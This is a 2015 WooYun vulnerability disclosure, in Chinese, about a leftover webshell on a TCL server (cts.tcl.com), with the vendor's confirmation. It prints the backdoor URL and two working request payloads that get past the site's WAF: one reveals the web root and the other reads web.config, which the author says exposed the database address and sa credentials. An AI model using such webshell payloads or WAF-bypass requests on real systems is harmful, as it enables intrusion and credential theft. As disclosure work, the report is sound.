漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0150456
漏洞标题:TCL某站shell一枚(此处应有WAF)
相关厂商:TCL官方网上商城
漏洞作者: wefgod
提交时间:2015-10-29 21:41
修复时间:2015-12-14 09:00
公开时间:2015-12-14 09:00
漏洞类型:命令执行
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-29: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向核心白帽子及相关领域专家公开
2015-11-19: 细节向普通白帽子公开
2015-11-29: 细节向实习白帽子公开
2015-12-14: 细节向公众公开
简要描述:
TCL某站的shell一枚……应该是上了某颜色公司的waf。顺便有一处疑似越权的页面,但是似乎做不了啥
详细说明:
这网站以前是绩效管理的……我曾经在我的漏洞里面提到过他
现在不知道是用来干嘛的了
漏洞证明:
http://cts.tcl.com/
后门地址:
http://cts.tcl.com/admin/images/!.aspx
直接用菜刀访问:
经过其他一些测试,已经上了WAF,阻断哦,某些情况下可以看出这是某颜色公司的WAF特征
换一个形式即可:
http://cts.tcl.com/admin/images/!.aspx?w=Response.Write(HttpContext.Current.Server.MapPath("FileName"));;Response.End();&z1=RDpcXFdlYlJvb3RcXGN0c1xc
稍微绕一下waf,可以获取到web目录为:
D:\WebRoot\cts\
获取web.config的内容:
http://cts.tcl.com/admin/images/!.aspx?w=var m=new System.IO.StreamReader("D:/WebRoot/cts/web.config",Encoding.Default);Response.Write(m.ReadToEnd());m.Close();Response.End();&z1=RDpcXFdlYlJvb3RcXGN0c1xc
下图已经获取到数据库地址和密码
数据库……sa/1?
最后,貌似还有一个未授权访问?不过估计就是摆设哈
http://cts.tcl.com/admin/index.html
修复方案:
删除此shell。未授权访问那个,根据实际情况看看
版权声明:转载请注明来源 wefgod@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-10-30 08:58
厂商回复:
该系统正在改造,准备升级后重新上线,但是主机上的木马没有删除,感谢您的提醒.谢谢对TCL的关注与关心.
最新状态:
暂无